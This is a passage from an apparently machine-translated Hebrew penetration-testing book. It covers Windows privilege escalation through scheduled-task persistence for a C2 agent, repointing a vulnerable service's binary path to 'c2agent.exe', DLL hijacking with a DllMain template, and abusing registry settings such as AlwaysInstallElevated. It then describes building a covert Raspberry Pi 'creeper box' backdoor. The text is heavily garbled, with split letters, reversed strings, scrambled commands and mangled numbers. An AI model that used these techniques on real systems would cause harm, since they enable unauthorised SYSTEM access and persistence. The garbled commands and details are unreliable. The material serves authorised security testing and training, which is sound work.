‫שעהלה‪ :‬תאריך הת ח לה‪ :‬תאריך סיום‪:‬‬

‫הת ח‬
‫שעתכ ל‬
‫ים‪:‬ב ל בד‪,‬‬‫זמנ‬
‫חת‬ ‫חא‬ ‫סוג לו‬
‫פעם‬
‫לא‬
‫לא‬
‫לא‬
‫ימים‪:‬‬ ‫לא‬
‫חוד שים‪:‬‬ ‫לא‬
‫חזור‪ :‬כ ל‪:‬‬ ‫שעה א חת‪0 ,‬ד קות‬
‫חזור‪ :‬עד‪ :‬זמן‪:‬‬ ‫אף א חד‬
‫חזרה‪ :‬עד‪ :‬מ שך‪:‬‬ ‫‪ 24‬שעות‪0 ,‬ד קות‬

‫חזור‪ :‬עצור אם עדיין פוע ל‪:‬‬ ‫נ כֶה‬
‫ָ‬
‫נראה כי מ שימה זו היא סוג ש ל תה ליך ני טור בריאותי והיא מ בוצעת כ ל שעה‪ .‬זה מופע ל ב‪-‬‬
‫‪ SYSTEM‬כך שאם אתהי כו ל לה ח ליף את ‪ HEARTB.exe‬בדי ס ק‪ ,‬אתה מו כן ל ל כת‪:‬‬
‫)‪Systems Corp\HeartBeat\HEARTB.exe -schedule HEARTB.exe NT AUTHORITY\SYSTEM:(I)(F‬‬

‫‪C:\Program Files\DanTek‬‬
‫)‪BUILTIN\Administrators:(I)(F‬‬
‫)‪BUILTIN\Users:(I)(F‬‬
‫זה מה שאנ חנו אוה בים לראות! גי שה מ לאה ל‪BUILTIN\Users! -‬ה טמ טום הזה נפוץ‬
‫למדי בתו כנות ש ל צד ש לי שי‪.‬‬
‫כפי שצוין קודם ל כן‪ ,‬מתזמן המ שימות הוא גם דרך שימו שית לה שיג התמדה או ני טור‬
‫בריאותו ש ל סו כן ‪ C2‬ש לך‪ .‬הפ קודות ה באות אמורות להיות שימו שיות בה ק שר זה‪:‬‬
‫כדי לתזמן מ שימה שפוע לת ב כ ל פעם שהמער כת מופע לת‪:‬‬

‫‪schtasks create tn <TaskName> tr <TaskRun> sc onstart‬‬
‫כדי לתזמן מ שימה שפוע לת כא שר מ שתמ שים נ כנ סים‪:‬‬
‫‪schtasks create tn <TaskName> tr <TaskRun> sc onlogon‬‬
‫כדי לתזמן מ שימה שפוע לת כ שהמער כת לא פעי לה‪:‬‬
‫}‪schtasks create tn <TaskName> tr <TaskRun> sc onidle /i {1 - 999‬‬
‫כדי לתזמן מ שימה שפוע לת פעם א חת‪:‬‬
‫‪ schtasks‬ליצור ‪ tn <TaskName> tr <TaskRun> sc‬פעם א חת ‪st <HH:MM>/‬‬
‫כדי לתזמן מ שימה שפוע לת עם הר שאות מער כת‪:‬‬
‫‪schtasks create tn <TaskName> tr <TaskRun> sc onlogon /ru System‬‬
‫כדי לתזמן מ שימה שפוע לת במ ח ש ב מרו ח ק‪:‬‬
‫>‪schtasks create tn <TaskName> tr <TaskRun> sc onlogon /s <PC_Name‬‬
‫ניצו ל שירותים פגיעים‬

‫ניצו ל שירותים פגיעים‬

‫שירותי ‪ Windows‬מיועדים להפע לה עם הר שאות ג בוהות‪ .‬אם ל שירות ‪Windows‬י ש‬
‫פרמ טרים שמ שתמ שי כו ל ל שנות‪ ,‬ניתן ל שנות את הנתי ב ל קו בץ ההפע לה ש ל ה שירות‬
‫כך שיצ ביע ע ל קוד מותאם אי שית ו לה שתמ ש בו כדי לה שיג ביצוע פ קודה עם הר שאות‬
‫ה שירות ‪ -‬בדרך כ ל ל ‪SYSTEM .‬הצעד הרא שון הוא לר שום את ה שירותים הפוע לים‬
‫ע ל המאר ח‪:‬‬
‫הפ ל ט נ ק טע ל קיצור‬
‫‪C:\Users\wallsopp>net start‬‬
‫שירותי ‪Windows‬א לה מופע לים‪:‬‬
‫שירות העד כונים ש ל ‪Adobe Acrobat‬‬

‫שירות נגד תו כנות זדוניות ש ל מי קרו סופ ט‬
‫בדי קת ר שת ש ל מי קרו סופ ט‬
‫מתזמן שיעורי מו ל טימדיה‬
‫מנה ל הת קן נ טו ‪HPZ12‬‬
‫‪Netlogon‬‬
‫חי בורי ר שת‬
‫שירות ר שימת ר שתות‬
‫מודעות למי קום בר שת‬
‫שירות ממ ש ק חנות ר שת‬
‫פ ל טפורמת הגנת תו כנת ‪ Office‬ק בצים לא מ קוונים‬
‫‪ParagonMounter‬‬
‫ח בר ו ש ח ק‬
‫מנה ל הת קן ‪Pml HPZ12‬‬
‫כּ ֹו ַח‬
‫‪Print Spooler‬‬
‫זיהוי חומרת מע טפת‬
‫כר טי ס ח כם‬
‫מאר ח סו כן ‪SMS‬‬
‫מתזמן מ שרות טופו לוגיה ש ל ר שת ‪SolarWinds‬‬
‫גי לוי ‪SSDP‬‬
‫‪VulnService‬‬
‫הפ קודה הו ש למה בהצ ל חה‪.‬‬
‫כדי ל ק ב ל את הפרמ טרים ע בור שרת בודד‪:‬‬

‫‪C:\Users\wallsopp>sc qc VulnService‬‬
‫‪[SC] QueryServiceConfig SUCCESS‬‬
‫‪ERROR_CONTROL BINARY_PATH_NAME : D:\vuln\vulnerable.exe‬‬

‫‪SERVICE_NAME:‬‬
‫‪: 20Power‬‬ ‫‪TYPE START_TYPE‬‬
‫‪WIN32_OWN_PROCESS‬‬
‫‪: 2 AUTO_START‬‬
‫‪ : 1‬רגי ל‬
LOAD_ORDER_GROUP :
0 :‫תג‬
: VulnService
‫הצג שם‬
: ‫ת לות‬
‫ מער כת מ קומית‬SERVICE_START_NAME:
‫ניתן ל שאו ל שירותים בנפרד או באצווה כדי ל ק בוע את כ ל לי ב קרת הגי שה ש להם‬
‫ שהיא הורדה ב חינם באתר‬Microsoft Sysinternals, ‫)תזד ק ק ל ח בי לת‬
Microsoft): ‫האינ טרנ ט ש ל‬
C:\Users\wallsopp>accesschk.exe -ucqv VulnService VulnService
[‫רמת חו בה בינונית ) ברירת מ חד ל( ] ל לא כתי בה‬

RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
‫\מנה לי מער כת‬NITLIUBRW
SERVICE_ALL_ACCESS
‫\מ שתמ שים מאומתים‬YTIROHTUARW NT
‫\אינ טרא ק טי בי‬YTIROHTUAR NT
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
‫ ר שות\ שירות‬R NT
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
:‫מזהים את טעות הא ב ט חה? זה כאן‬

‫\מ שתמ שים מאומתים‬YTIROHTUARW NT
:‫ כדי לה שיג זאת‬VulnService . ‫כ ל מ שתמ ש מ חו ברי כו ל ל שנות פרמ טרים ע בור שירות‬
C:\Users\wallsopp>sc config VulnPath binpath= "C:\temp\c2agent.exe"

C:\Users\wallsopp>sc config VulnPath obj= ".\LocalSystem" password=
""
‫ אך תמידי ש ל בדו ק את הר שאת ה שירות כ ח ל ק‬,‫דוגמה זו היא מע ט מתו כננת‬

.‫ מ כיוון שזוי כו לה להיות ניצ חון מהיר‬,‫מתה ליך הה ס למה ש ל ההר שאות‬
DLL ‫ח טיפת קו בצי‬

‫ח טיפת קו בצי ‪DLL‬‬

‫קו בצי ‪DLL‬הם ספריות ש ל פונ קציות שניתן ליי בא לאפ לי קציה‪ .‬הםי כו לים להיות קנייניים‬
‫ליי שום בודד או ל שמ ש כממ ש ק ת כנותיי שומים )‪ (API‬כדי ל ספ ק דרך ליי שומים א חרים‬
‫ל ח לו ק את הפונ קציונ ליות שהם מ ספ קים‪ .‬הדוגמה הנפוצה ביותר ש ל הא חרון היא‬
‫ספריית ‪ API‬ברמת מער כת ההפע לה כגון ‪ kernel32.dll,‬שנת ק לה בפר ק ‪2 .‬‬
‫כא שר קו בץ הפע לה מופע ל‪ ,‬הוא מ ק ב ל מר ח ב תה ליך מוגן מ ש לו‪ ,‬כ לומר‪ ,‬כתו בת זי כרון‬
‫היאי ח סית לתה ליך זה ותו כנות א חרות אינןי כו לות ל כתו ב ב טעות ע ל ה ח ל ק שהו קצה‬
‫לה בזי כרון‪ DLL, .‬לעומת זאת‪ ,‬נ טען לתוך ח ל ל התה ליך ש ל התו כנית ה קוראת לו‪ ,‬ו ל כ ל‬
‫ד בר‪ ,‬הופך ל ח ל ק מאותה תו כנית‪.‬י ש לזהיתרונות ו ח סרונות מנ קודת מ ב ט ש ל פיתו ח‬
‫תו כנה‪ ,‬א ב ל מה שמעניין את התו קף הוא ש ל‪ LLD-‬אין הר שאות הפע לה מ ש לו‪ .‬הוא‬
‫יור ש הר שאות מ קו בץ ההפע לה שמיי בא אותו‪ .‬במי לים פ שו טות‪ ,‬אם אפ לי קציה פוע לת‬
‫עם הר שאות מוג ברות ואתהי כו ל לה ח ליף ‪ DLL‬שהיא מיי באת עם א חד שיצרת‪ ,‬אז‬
‫אפ שר ל ק ב ל ביצוע קוד עם אותן הר שאות‪.‬‬
‫במונ חים ש ל סיור‪ ,‬אתה צריך לדעת ש לו שה ד ברים‪:‬‬

‫אי לו תה לי כיםי טענו עם הר שאות ג בוהות‬
‫אי לו קו בצי ‪DLL‬אתהי כו ל לדרו ס עם ההר שאות שי ש לך‬
‫אי לו קו בצי ‪ DLL‬מיו באים ב כ ל תה ליך נתון‬
‫דרך נו ספת ל ח טוף קו בצי ‪DLL‬היא לנצ ל את סדר נתי ב ה חיפו ש ש ל ‪ Windows‬ו לא לץ‬
‫קו בץ הפע לה ל טעון מופע א חר ש ל ה ספרייה במ קום א חר ב כונן‪ .‬עם זאת‪ ,‬ההגנה מפני‬
‫זה היא כעת טריוויא לית וי כו לה להיות פ שו טה כמו שינוי ערך ברי שום‪ .‬חתימת קוד ת בי ס‬
‫את שתי הגי שות‪.‬‬
‫כדי למצוא את כ ל התה לי כים הפוע לים כעת כ‪SYSTEM, -‬ה שתמ ש בפ קודה ה באה‪:‬‬
‫‪c:\> tasklist.exe FI "username eq system" v‬‬
‫זהייתן פ ל ט דומה לזה ה בא‪:‬‬
‫‪K Unknown 0:00:01 N/A‬‬

‫‪N/A svchost.exe 15.420‬‬ ‫‪ 1624‬שירותים‬ ‫‪0‬‬
‫‪17.732 K Unknown 0:00:01‬‬ ‫‪NT AUTHORITY\SYSTEM‬‬
‫‪brevity> dsAccessService.exe‬‬
‫‪<trimmed for‬‬ ‫‪ 1788‬שירותים‬ ‫‪0‬‬
‫‪NT AUTHORITY\SYSTEM‬‬
‫ לא‬spoolsv.exe 14.428 K 1972 ‫שירותים‬ 0

0:00:00 N/A ‫ידוע‬ NT AUTHORITY\SYSTEM
TdmService.exe 15.824 K ‫ שירותים‬1644 0

0:00:00 N/A ‫לאידוע‬ NT AUTHORITY\SYSTEM
WmiPrvSE.exe 19.628 K ‫ שירותים‬2236 0

0:00:04 N/A ‫לאידוע‬ NT AUTHORITY\SYSTEM
‫ לא‬WvPCR.exe 9.292 K ‫ שירותים‬2284 0

‫ לא‬armsvc.exe 5.336 K ‫ שירותים‬2468 0

‫ירותים‬
0:00:00 N/ ‫ ש‬2700
A ‫ידוע‬ ‫ לא‬cyserver.exe 4.124 K 0
NT AUTHORITY\SYSTEM
‫ירותים‬
0:00:13 N/A ‫לאידוע‬ ‫ ש‬2768
CyveraService.exe 73.760 K 0
NT AUTHORITY\SYSTEM
‫ירותים‬
0:00:00 N/A ‫לאידוע‬ ‫ ש‬2808
EmbassyServer.exe 9.328 K 0
NT AUTHORITY\SYSTEM
‫ירותים‬
0:00:00 N/A ‫ידוע‬ ‫ ש‬3088
‫ לא‬pabeSvc64.exe 16.220 K 0
NT AUTHORITY\SYSTEM
RunSrv.exe 4.512 K Unknown 0:00:00 N/A SWNTMJobSchedulerSvc.exe

‫ שירותים‬3200 3284 Services 0
NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM ‫ לאידוע‬0 124.184 K

‫ לא זמין‬0:00:01
3860
0:00:00 N/‫י‬A
‫ירות‬‫ לא ש‬tda.exe 4.756 K
‫ידוע‬ 0
NT AUTHORITY\SYSTEM
McAfee.TrueKey.Service.ex 3940 Services 54.264 K Unknown NT AUTHORITY\SYSTEM 0
‫ לא זמין‬0:00:01
0:00:00 N/4012 ‫ירותי‬
A ‫ידוע‬ ‫ש‬
‫ לא‬tdawork.exe 3.216 K 0
NT AUTHORITY\SYSTEM
4020 ‫שירותי‬
0:00:00 N/A ‫ לאידוע‬valWBFPolicyService.exe 4.676 K 0
NT AUTHORITY\SYSTEM
‫ירותים‬
0:00:00 N/ ‫ ש‬4028
A ‫ידוע‬‫ לא‬tdawork.exe 3.208 K 0
NT AUTHORITY\SYSTEM
‫‪tdawork.exe 3.212 K‬‬ ‫‪ 4036‬שירותים‬ ‫‪0‬‬

‫לאידוע ‪0:00:00 N/A‬‬ ‫‪NT AUTHORITY\SYSTEM‬‬
‫זהו שי לו ב ס טנדר טי למדי ש ל ‪MS Windows‬ויי שומי צד ש לי שי‪ .‬כדוגמה‪ ,‬שירות‬

‫‪ RunSrv‬פוע ל ‪ -NT AUTHORITY\SYSTEM.‬כה ש ל ב ה בא הוא לה בין אי לו קו בצי ‪DLL‬‬
‫זה מיי בא‪.‬י ש כ לי נ חמד ב שם ‪ Dependency Walker‬שיע שה זאת‪ .‬זה מציג מ ספר‬
‫רמות ש ל ת לות ) כ לומר‪ ,‬אי לו ת לותי ש ‪ -DLL‬ל עצמם(‪.‬‬
‫טעינת ‪ RunSrv.exe‬לתוך ‪ Dependency Walker‬מ ביאה לאיור ‪6.7.‬‬
‫איור ‪ 6.7: Dependency Walker‬מציג נתי בים מ לאים ש ל ‪DLL.‬‬
‫‪ RunSrv.exe‬מיי בא ‪ DLL‬ב שם ‪MMFS2.DLL,‬אותו אנוי כו לים לה ח ליף‪:‬‬
‫)‪Application Server Framework>icacls mmfs2.dll mmfs2.dll BUILTIN\Administrators:(I)(F‬‬

‫‪D:\Program Files (x86)\Jericho‬‬
‫)‪NT AUTHORITY\SYSTEM:(I)(F‬‬
‫‪\YTIROHTUANT‬מ שתמ שים מאומתים‪(I)(M):‬‬
‫)‪BUILTIN\Users:(I)(F‬‬
‫ה ש ל ב ה בא הוא ליצור ‪ DLL‬שי בצע קוד או טומ טית ברגע שהואיו בא לתה ליך‬
‫‪ RunSrv.exe .‬ברור שזה ספציפי ל שפה‪ ,‬א ב ל הדוגמה המוצגת היא ע בור ‪Visual C++.‬‬
‫צור פרוי ק ט ‪ DLL‬חד ש והד ב ק‬
‫ה קוד ה בא‪:‬‬
‫>‪#include <stdio.h‬‬
‫>‪#include <windows.h‬‬
‫)‪BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved‬‬

‫} ‪")ftnirp‬מ חרוזת זו תי כת ב למ סוף כא שר ‪-DLL‬ההזה מיו בא\‪;("n‬‬
‫ל ש בור; {‬
‫זוהי פונ קציית ‪ DLLMain‬פ שו טה מאוד שתת בצע ברגע שה‪LLD-‬יו בא‪ .‬ה קודי בוצע כ‪-‬‬
‫‪SYSTEM.‬זה אומר שאם אתה קורא לפ קודה )(‪ Shell‬כדי להפעי ל קו בצי הפע לה‬
‫חיצוניים‪ ,‬אז גם הםייר שו הר שאות ברמת ‪SYSTEM .‬‬
‫כרייה ש ל הרי שום ש ל ‪Windows‬‬

‫הרי שום ש ל ‪Windows‬י כו ל להיות מ קור מידע ע שיר; זה א חרי ה כ ל המ קום ש בו רו ב‬
‫תו כנות ‪Windows‬המודרניות מא ח סנות את פרמ טרי התצורה ש להן‪.‬‬
‫כא שר סי סמאות מאו ח סנות ע לידייי שומים‪ ,‬הן מאו ח סנות לרו ב ‪ -hash‬באו מ קודדות‬
‫ברי שום‪ ,‬ו ב כך הופ כות אותן לפגיעות להת קפות קריפ טה וה שוואה ) במיו חד אם הן לא‬
‫מומ ל חות(‪ .‬תו כנת ה ש ל ט הר חו ק ש ל ‪ VNC‬והגר סאות ש לה עדיין מא ח סנות סי סמאות‬
‫כמ חרוזות המ שו חזרות ב ק לות ברי שום‪.‬‬
‫אין בוד ק ע ט ב חיים ש לאיהיה לו לפ חות סיפור א חד ע ל איך הוא‪/‬הוא הצ לי ח להתפ שר‬
‫ע ל ר שת ש למה לא חר ש קי ב ל גי שה לת חנת ע בודה א חת מ כיוון ש סי סמת ‪-VNC‬ה‬
‫הייתה מ שותפת ב כ ל הת שתית‪VNC .‬נו ח א ב ל סיו ט בי ט חוני‪.‬‬
‫י שנה הגדרה ברי שום ש ל ‪ Windows‬ב שם ‪AlwaysInstallElevated‬המאפ שרת‬

‫למת קינים ‪ ism.‬להת קין תמיד כ‪ SYSTEM -‬ל לא ק שר להר שאות המ שתמ ש שמת קין‬
‫את ה ח בי לה‪ .‬אניי כו ל לה בין למה זה ע שוי לה ק ל מע ט ע ל חייו ש ל מנה ל המער כת מצד‬
‫א חד‪ ,‬א ב ל זהו פגם א ב ט חה עצום ש בעצם מאפ שר ל כ ל א חד ל בצע כ ל קוד שהוא רוצה‬
‫עם גי שת ‪SYSTEM .‬‬
‫זה נהדר אם אתה מ חפ ש לה ס לים את הז כויות ש לך‪ .‬ער כי הרי שום נמצאים כאן‪:‬‬
‫‪HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer‬‬
‫‪HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer‬‬
‫הערך ‪AlwaysInstallElevated‬אינו מוגדר ל ‪-1‬ת חת שני מפת חות הרי שום‬

‫ה קודמים‪.‬‬
‫אפי לו מי קרו סופ ט‪ ,‬למרות ה כ ל לת פונ קציונ ליות זו במער כות ההפע לה ש לה‪ ,‬מזהירה‬
‫מפני שימו ש בפוע ל בה‪.‬‬
‫אפ שרות זו שוות ערך להענ קת ז כויות מנה ליות מ לאות‪ ,‬שע לו לות להוות סי כון‬
‫בי ט חוני עצום‪ .‬מי קרו סופ ט מונעת בתו קף את ה שימו ש בהגדרה זו‪.‬‬
‫פי קוד ו ב קרה ח ל ק ‪VI:‬תי בת ה קריפ‬

‫אם אתה מצ לי ח ל ק ב ל גי שה ל טוו ח קצר למי קומו הפיזי ש ל היעד‪ ,‬כדאי ל ש קו ל שימו ש‬
‫בד לת א חורית ש ל חומרה או " קופ סת קריפר"‪ .‬זה לא התיי ח סות ‪ -Minecraft‬לא לא‬
‫מונ ח שנ ט בע ב ספר מ‪ How to Own a Continent ,4002-‬מאת ג'יי ק רו ל ס טון‪ .‬זהו‬
‫או סף מ שע שע ש ל ספרות א ב ט חה ומאז אני מ שתמ ש במונ ח ) למרות שזה בה ח ל ט‬
‫אפ שרי שאני הי חיד(‪ .‬אתה מוזמן לה שתמ ש באיזה מונ ח שאתה אוה ב‪.‬‬
‫באופן מ סורתי‪ ,‬תי בת ה קריפרים הייתה מ ח ש ב אי שי ק טן במיו חד המ חו בר באופן‬

‫די ס קר טי לר שת היעד‪ .‬עם הפרי חה הא חרונה בת חום הא ל ק טרוני קה הת ח בי בים‪,‬י ש‬
‫לנו אפ שרויות טו בותיותר )וזו לותיותר(‪.‬י שנם שני תר חי שים שאדון בהם‪:‬‬
‫ד לת א חורית די ס קר טית המאפ שרת גי שה מר חו ק וי כו לות הת קפה מור כ בות‬

‫המ חו ברות בדרך כ ל לי שירות למתג‪.‬‬
‫ג שר פ סי בי המ חו בר ב שורה לנ קודת קצה או עמוד שדרה ש ל ר שת‪ ,‬אך ור ק כדי‬
‫ל ספ קיירו ט נתונים‪.‬‬
‫מפר ט תי בת קריפר‬
‫כדי לה שיג את הפתרון הזה ש ל תי בת ז חי לה‪ ,‬ת חי לה ח שו ב ל ש קו ל את דרי שות ה חומרה‪:‬‬
‫מ ספי ק חז ק כדי להיות מ סוג ל להפעי ל תו כנת בדי קת חדירה ו סו כן ‪SSH C2.‬‬
‫נתונים שנ ל כדים ומאו ח סנים ע לידי המ כ שיר צרי כים להיות מאו ב ט חים‪ ,‬כ לומר‪,‬‬
‫בצורה מוצפנת‪.‬‬
‫אם אפ שר‪ ,‬ההת קן צריך להיות מ סוג ל ‪Power over Ethernet (PoE).‬זה מ ק טין‬
‫את ט ביעת הרג ל ש לו ומ ב טי ח שאם הואיתג לה ו כ ב ל הר שת נמ שך )אויציאת המתג‬
‫מו ש בתת(‪ ,‬הואיי כ בה מיד‪ .‬זה מ ב טי ח ) בהנ חה שההצפנה מיו שמת כה ל כה( ניתו ח‬
‫פורנזי ש ל המ כ שיריהיה ב לתי אפ שרי‪.‬‬
‫קי שוריות מר חו ק היא דרי שה ברורה וצרי כה להיות מיו שמת מ חוץ לפ ס ) כ לומר‪ ,‬לא‬
‫באמצעות ת שתית הר שת ש ל היעד עצמו(‪ .‬הדרך ה ק לה והיעי לה ביותר לע שות זאת‬
‫היא באמצעות מתאם ‪3G/4G‬הנו שא את תע בורת ה‪ HSS-‬ב חזרה ל שרת ‪C2.‬‬
‫ב סעיף זה אני דן במ כ שיר ‪ Raspberry Pi 3B‬ו בתצורה ש לו‬

‫ב ח ל ק זה אני דן במ כ שיר ‪ Raspberry Pi 3B‬ו בתצורה והיי שום ש לו בפעי לויות בדי קות‬
‫חדירה‪ .‬המ כ שיר עונה ע ל כ ל הדרי שות ה ל לו מ חוץ ל קופ סה‪ ,‬מ ל בדי כו לות ‪ PoE‬ו‪/G3-‬‬
‫‪ 4G,‬שניתן להו סיף‪ .‬זה מאפ שר ל בנות את פתרון ה קריפ בפ חות מ‪ 001-‬דו לר‪.‬‬
‫די ס ק מ לא מו ל הצפנה מוג ב לת‬
‫הת קן המ שתמ ש בהצפנת די ס ק מ לאה לאיהיה ניתן לאת ח ל מ כיוון שה קונ סו לה‬
‫תדרו ש בי טוי סי סמה כדי ל ב ט ל את נעי לת ה כונן ‪-‬אם כי זה ע שוי להיות בדיו ק מה‬
‫שאתה צריך ו כ כזה זו הגי שה שאני נו ק ט בפר ק זה‪ .‬פתרון נו סף הוא הצפנת די ס ק‬
‫ח ל קית‪ ,‬להגדיר את ההת קן ל טעון את מנה לי ההת קן ש ל ‪ 3G/4G‬באת חו ל ו להת ק שר‬
‫ה ביתה ו לא חר מ כן ניתן ל ב ט ל את נעי לת המ חיצה המוצפנת ע לידי ה שרת או באופן‬
‫ידני ו לה שתמ ש בו אך ור ק לא ח סון נתונים‪ .‬ה ס כנה ב כך היא ש סו כן ‪C2‬וי כו לותיויתג לו‬
‫כ כ ל הנראה ע לידי ניתו ח מ שפ טי מו כ שר‪.‬‬
‫הי כרות עם ‪ Raspberry Pi‬ומר כי ביו‬

‫ה‪ iPR-‬הוא מ ח ש ב בגוד ל כר טי ס א שראי‪ .‬המפר ט ש לו מה קופ סה מר שים‪:‬‬
‫‪SoC: Broadcom BCM2837‬‬

‫מע בד‪4× ARM Cortex-A53, 1.2GHz :‬‬
‫‪GPU: Broadcom VideoCore IV‬‬
‫זי כרון ‪ RAM: 1GB LPDDR2 (900‬מגה‪-‬הרץ(‬
‫ר שת‪10/100 Ethernet, 2.4GHz 802.11n Bluetooth :‬‬

‫א ל חו טי‪Bluetooth 4.1 Classic, Bluetooth Low Energy :‬‬
‫א ח סון‪microSD :‬‬
‫‪ GPIO:‬כותרת ‪ 40‬פינים‪ ,‬מאו כ ל סת‬
‫יציאות‪ HDMI, :‬ש קע אודיו‪-‬וידאו אנ לוגי ‪ 3.5‬מ"מ‪4× USB 2.0, Ethernet, ,‬‬
‫ממ ש ק טורי מצ למה ‪ (CSI),‬ממ ש ק טורי לתצוגה )‪(DSI‬‬
‫‪ 1GB‬ש ל זי כרון ‪ RAM‬מ שותף בין המע בד וה‪ ,UPG-‬וה‪ tenrehtE-‬וה‪BSU-‬יו ש בים ע ל‬
‫אותו או טו בו ס א ב ל ע ל ה כ סף הזה אי אפ שר להת לונן‪ .‬שימו ל ב להיעדר מ ק לדת‪ ,‬ע כ בר‬
‫ומ סך‪ .‬ראה איור ‪6.8.‬‬
‫איור ‪-Raspberry Pi 3B‬ה ‪ 6.8:‬במ לוא הדרו‪.‬‬
‫הא ל חו ט המו בנה כמע ט ח סר תוע לת ל בדי קת חדירה‪ ,‬מ כיוון ש לא ניתן להצי ב את‬
‫המתאם במצ ב צג‪ .‬זה אומר שאיןיירו ט מנות )אם כי זהי כו ל ל שמ ש כערוץ ניהו ל‬
‫נו סף(‪ .‬עם זאת‪ ,‬אין סי בה ש לא תו כ ל ל ח בר מ שהו טו ביותר לא חת מיציאות‬
‫‪-USB‬ההר בות‪.‬‬
‫‪GPIO‬‬
‫מת קן ‪ 40‬פינים תפו קה כ ל לית )‪ (GPIO‬מאפ שר לך להו סיף חומרה מותאמת אי שית‬
‫ל לו ח‪.‬י ש הר בה אפ שרויות לר כי שה מהמדף‪ ,‬כו ל ל מ ס כי מגע ק טנים‪ ,‬ממ ש קי רו בו טי קה‬
‫ומודו לי ‪PoE.‬הא חרון מתאים לצר כים ש לנו בצורה מו ש למת‪ .‬ראה איור ‪6.9.‬‬
‫איור ‪ 6.9: Raspberry Pi‬עם כו בע ‪)PoE‬התוו ספה חומרה למע לה(‪.‬‬
‫ב חירת מער כת הפע לה‬

‫אתם מפונ קים ב ב חירה מ ב חינת מער כות הפע לה שפוע לות ע ל ‪-Pi.‬ה‬
‫י שנן מ ספר בנייה מותאמות אי שית ש ל לינו ק ס ‪-UNIX‬וזמינות‪ ,‬מהמו כר )או בונ טו( ועד‬
‫למזו כי ס טי ‪ (RISC OS).‬בפר ק זה‪ ,‬אני נ שאר עם הגר סה הר שמית ש ל ‪ Pi‬ש ל ד ביאן ב שם‬
‫‪Raspbian.‬זהיותר ממתאים למה שצריך כאן ויהיה מו כר מאוד ל כ ל מי שה שתמ ש‬
‫בד ביאן‪ .‬עם זאת‪ ,‬בעיה א חת )וזה ח ל ע ל כ ל מער כת ההפע לה הזמינה ע בור ‪-Pi),‬ההיא‬
‫שאין מת קנים‪ ,‬ר ק תמונות די ס ק‪ ,‬שנ כת בות ‪ -microSD.‬ל למרות שזה ב סדר גמור ע בור‬
‫רו ב ה שימו שים‪ ,‬זה אומר שד ברים מ סוימים ) כמו הצפנת די ס ק מ לאה( צרי כים להיות‬
‫מוגדרים לא חר ההת קנה‪ ,‬מה שי כו ל להיות קצתיותר מור כ ב ממה שזהי כו ל להיות‪ .‬עם‬
‫זאת‪ ,‬הוראות מ לאות כ לו לות ב סעיף ה בא‪ Raspbian .‬גםיור שת את תאימות ה חומרה‬
‫ה לי בר לית ש ל ד ביאן‪ ,‬כך שאינך צריך לדאוג לג בי מנה לי הת קנים ח סרים בעת ק ביעת‬
‫התצורה ש ל ת ק שורת ‪ 3G‬מ חוץ לפ ס‪.‬‬
‫הגדרת הצפנת די ס ק מ לא‬

‫הת קנת ד ביאן בתוך מנה ל נפ ח לוגי מוצפן )‪(LVM‬היא מ שהו שמת בצע בדרך כ ל ל‬
‫במה לך תה ליך ההת קנה ועניין ש ל ב חירת אפ שרות מתפרי ט‪ .‬עם זאת‪ ,‬עם ‪Raspbian‬‬
‫ע ל ‪-Pi‬האין הת קנה כ ש לעצמה‪ .‬ל כן התה ליך קצתיותר מעור ב א ב ל בה ח ל ט לא ב לתי‬
‫אפ שרי‪ .‬ע בור ה ש ל בים הא לה‪ ,‬תצ טרך‪:‬‬
‫שני כר טי סי ‪ microSD‬עם מתאם ‪SD‬‬

‫מ ח ש ב עם ד ביאן )או הפצת לינו ק ס א חרת(‬
‫‪ Raspberry Pi 3B‬עם מ ק לדת ‪USB‬‬
‫מתאם ‪ USB‬שי כו ל ל ק חת כר טי ס ‪ )SD‬לא )‪microSD‬‬
‫בד ביאן‪ ,‬צרו ב את ההפצה העד כנית ביותר ש ל ‪ Raspbian‬לא חד מ כר טי סי ‪-microSD‬ה‬
‫באופן ה בא‪ .‬אני מתיי ח ס ל כר טי ס הזה כ‪bootsd: -‬‬
‫‪$ sudo umount devsdb1 $ sudo dd bs=4M if=homewil/raspbian.img of=devsdb‬‬
‫ה ש ל בים ה באים הם כד ל קמן‪:‬‬

‫‪1.‬הפע ל את ‪Pi.‬‬
‫‪2.‬הר ח ב את התמונה כדי למ לא את כר טי ס ‪-SD.‬ה‬
‫‪ 3.‬שנה את ה סי סמה‪.‬‬
‫‪4.‬הפע ל את שרת ‪SSH.‬‬
‫‪ 5.‬שנה את שם המאר ח ל‪bootsd. -‬‬

‫‪6.‬את חו ל מ חד ש‪.‬‬
‫‪ 7.‬עד כן את ה קו ש חה‪.‬‬
‫מ שורת הפ קודה ‪Pi,‬זה מו שג באופן ה בא‪:‬‬
‫‪install openssh-server $ sudo update -rc.d -f ssh‬‬

‫‪lvm2 $ sudo apt-get install dcfldd $ sudo apt-get‬‬
‫‪apt-get install cryptsetup $ sudo apt-get install‬‬
‫‪get update $ sudo apt-get dist-upgrade $ sudo‬‬
‫‪$ sudo passwd $ sudo apt-‬ה סר ‪update-rc.d -f ssh‬‬
‫‪ $ sudo‬ברירת מ חד ל ‪$ sudo etcinit.d/hostname.sh‬‬
‫‪$ sudo echo bootsd > etchostname‬הת ח ל‬
$ sudo reboot $ sudo rpi-update
‫הה שני באופן‬-microSD ‫ ע ל כר טי ס‬Raspbian ‫ צרו ב את ההפצה העד כנית ביותר ש ל‬,‫שו ב מד ביאן‬
systemsd: ‫ אני מתיי ח ס ל כר טי ס הזה כא ל‬.‫ה בא‬
$ sudo umount devsdb1 $ sudo dd bs=4M if=homewil/raspbian.img of=devsdb
:‫ ה ש ל בים ה באים הם כד ל קמן‬,‫שו ב‬

Pi. ‫הפע ל את‬1.
‫ה‬-SD. ‫הר ח ב את התמונה כדי למ לא את כר טי ס‬2.
.‫ שנה את ה סי סמה‬3.
SSH. ‫הפע ל את שרת‬4.
systemsd. -‫ שנה את שם המאר ח ל‬5.

